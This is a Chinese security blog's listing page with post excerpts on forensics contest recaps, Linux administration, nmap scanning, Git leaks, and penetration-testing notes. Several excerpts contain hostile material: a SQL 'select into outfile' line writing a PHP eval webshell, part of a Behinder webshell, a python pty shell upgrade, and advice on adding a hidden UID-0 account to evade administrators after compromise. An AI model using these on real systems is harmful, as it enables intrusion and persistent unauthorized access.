- 博客(286)
- 资源 (1)
- 收藏
- 关注
原创 2023美亚杯个人赛复盘(三)
94. 参考’Windows 7’文件夹回答以下题目,在Windows 7中\Users\Allen\Downloads内有mp3文件(miracle.mp3),mp3文件更改名称前的名称是什么?参考’Windows 7’ 文件夹回答以下题目,在Windows 7中,potplayer最后播放的文件名?93. 参考’Windows 7’文件夹回答以下题目,在 Windows 7中\Users\Allen\Downloads内有mp3文件(miracle.mp3),更改名称时间?
2023-11-21 09:41:14 533
原创 2023美亚杯个人赛复盘(二)
2023月8月的一天,香港警方在调查一起网络诈骗案件时,发现有三名本地男子,分別为李大輝(李大辉),浩賢(浩贤)和Elvis CHUI,并确信这三名被捕男子均为大学同学。13. 参考Server文件夹下的 ’ Meiya_VPN.vmdk ’ 回答以下题目,这个访问服务器的“openvpn”帐户密码是多少?提示:请用大写字母与阿拉伯数字作答。14. 参考Server文件夹下的 ’ Meiya_VPN.vmdk '回答以下题目,在这个访问服务器中,“User1”账户之间的连接所使用的加密算法(密码)是什么?
2023-11-17 10:58:24 913
原创 2023美亚杯个人赛复盘(一)火眼+取证大师
参考’Window Artifacts.E01’内的Windows注册表回答以下题目,计算机有一个正在连接的网络接口,该接口连接DHCP服务器的IP地址是多少?37. 参考’Window Artifacts.E01’内的Windows注册表回答以下题目,计算机内的OneDrive程序版本是什么?参考’Window Artifacts.E01’内的Windows注册表回答以下题目,该计算机的操作系统是在哪一个时区?8.来自Elvis Chui计算机的镜像文件 (Windows Artifacts.e01)
2023-11-15 10:52:58 4055 1
原创 linux watch命令
在Linux中,有时需要每隔一段时间比如一秒或者两秒刷新一次,这时就可以使用watch 命令。每隔两秒刷新查看一下磁盘使用情况。
2023-06-30 13:30:43 392
原创 nmap探索存在主机
nmap -sP 10.1.0.1/24Ping扫描:只进行Ping,然后显现出在线(做出响应)的主机,使用该选项扫描可以轻易地获取目标信息而不会被轻易发现。在默认情况下,Nmap会发送一个ICMP回声请求和一个TCP报文到目标端口。Ping扫描的优点:不会返回太多的信息造成对结果的分析,并且这是一种非常高效的扫描方式。
2023-06-22 11:32:47 98
原创 Content-Type: multipart/form-data; boundary=${bound}
其中${bound}是一个占位符,代表我们规定的分隔符,为了表示独一性,一般都会复杂一点。
2022-06-05 10:05:34 441
原创 Git信息泄露漏洞
对域名进行目录扫描时,如果发现有.git就说明有可能存在git信息泄露。然后就可以试着使用GitHack(github上有)dump下源码
2022-05-27 17:35:57 575
原创 linux中赋予普通用户root权限的三种方式
前言在成功拿下一个服务器并提权成为root用户以后,为了减少root用户使用时间从而减少被网站管理员发现的概率,就需要新建一个普通用户,并赋予其完全的管理员权限,有以下三种常见的方式三种方式1. 直接修改/etc/passwd文件/etc/passwd文件里的第三列是UID,这个值为0的话就表示这个用户具有完全的管理员权限,所以新建一个用户后只需要把这个值置为0就可以:如图的ning这个账户,只是更改了UID,现在验证一下是否具有了root权限:可以看到,能打开/etc/shadow这个文件
2022-03-28 21:40:46 51716 5
原创 linux sudo简介
为什么需要sudo?在linux中,如果你是普通用户,想要执行管理员才有权限的命令,那么大概有以下三种途径:通过su - root 命令切换为root用户,这时必须知道root的密码(可能造成root用户的泄露)把自己加入到root 组中通过配置/etc/sudoers把自己加入到sudo中如何配置/etc/sudoers?如图,显然root用户可以使用sudo命令,-u参数指定用户。而当使用test1账户执行sudo时:显示不是sudoers file当然也没有创建用户的权利:
2022-03-27 17:27:06 5183
原创 linux 账户管理之用户管理
ID 范围说明:0 :系统管理员:当 UID 是 0 时,代表这个账号是『系统管理员』! 所以当你要让其他的账号名称也具有 root 的权限时,将该账号的 UID 改为 0 即可。 这也就是说,一部系统上面的系统管理员不见得只有 root 喔! 不过,很不建议有多个账号的 UID 是 0。1-499:系统账号:保留给系统使用的 ID,其实除了 0 之外,其他的 UID 权限与特性并没有不一样。默认 500 以下的数字让给系统作为保留账号只是一个习惯,由于系统上面启动的服务希望使用较小的权限去运行,因此不
2022-03-27 15:58:22 463
原创 拿到webshell后利用python改变shell类型
使用一条命令即可:python -c ‘import pty;pty.spawn(“/bin/bash”)’'''-c 后跟命令,也就是说后面引号里的内容相当于会执行的代码pty 模块定义了一些处理“伪终端”概念的操作:启动另一个进程并能以程序方式在其控制终端中进行读写。pty.spawn(argv[, master_read[, stdin_read]])生成一个进程,并将其控制终端连接到当前进程的标准 io。 这常被用来应对坚持要从控制终端读取数据的程序。'''所以在靶机里存在Pyth
2022-03-27 10:24:39 2214
原创 kali(linux) smbclient用法
Smb一般作为文件共享服务器,专门提供Linux与Windows之间的传送文件服务,在kali linux中提供了专用的客户端smbclient 下面就介绍一下其简单用法如图:-U 后面跟用户名和密码,如果没有则不需要加-U如图就可以使用linux的ls等命令进行操作了。3. get命令用来下载...
2022-03-27 09:53:09 6044
原创 550 Mailbox not found or access denied
今天处理了一个生产问题,有个同事发出的邮件失败,返回码为550 Mailbox not found or access denied,排除发送邮箱问题之后,发现有以下原因:1.2. 没有这个邮箱
2022-03-16 11:23:41 4857
原创 冰蝎新老版本使用方式注意事项
前言今天遇到一个很奇怪的问题,冰蝎在使用过程中明明马上传的也正确,就是连接不上,后来才发现是新版3.x和旧版2.x使用的马不一样导致的结果,先记录如下(以PHP为例):旧版的马:<?php@error_reporting(0);session_start();if (isset($_GET['pass'])){ $key=substr(md5(uniqid(rand())),16); $_SESSION['k']=$key; print $key;}else
2022-03-13 09:40:33 2537 1
原创 MongoDB 初识
和redis一样,是一种nosql数据库,默认端口是27017mongocola是一种图形化的管理工具:MongoDB安装时不添加任何参数,默认是不开启权限验证的,登录的用户可以对数据库任意操作而且可以远程访问数据库。在刚安装完毕的时候MongoDB都默认有一个admin数据库,此时admin数据库是空的,没有记录权限相关的信息。当admin.system.users一个用户都没有时,即使开启了权限验证,如果没有在admin数据库中添加用户,此时不进行任何认证还是可以做任何操作,直到在admin.
2022-03-06 13:09:08 2524
转载 数据库 CURB
CRUD是指在做计算处理时的增加**(Create**)、读取查询(Retrieve)、更新(Update)和删除(Delete)几个单词的首字母简写。主要被用在描述软件系统中DataBase或者持久层的基本操作功能。
2022-03-06 12:40:13 140
原创 linux 数据流重定向
需要注意的知识点:linux提供了垃圾桶机制: 有时候我们需要将信息统统丢掉,不显示到屏幕,也不记录到如何文件,有什么办法呢?当然有,在我们的linux中,有一个设备 /dev/null ,也就是空设备的意思,它就像一个黑洞,任何东西进入它都会消失。所有我们只需要将数据流重定向指这个设备就行了。上图表示把错误输出到垃圾桶里。&>可以将错误信息或者普通信息都重定向输出...
2022-03-06 12:15:19 394
原创 php setcookie
先看服务器端代码test.php:<?php $value = "my cookie"; setcookie("TestCookie",$value); echo "my cookie is".$value; ?>访问时抓包
2022-03-04 13:54:33 1855
原创 select into outfile
这个功能在写入shell的过程中可以试试,比如:select ‘<?php @eval($_POST[value]);?>’ into outfile ‘c://phpstudy//www//shell.php’但是一般都会被禁止
2022-03-03 17:09:13 271
LJM129-M134_UWWL_4-1_UWWL_3_1_Full_WebPack_44.3.2667.exe
2020-05-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人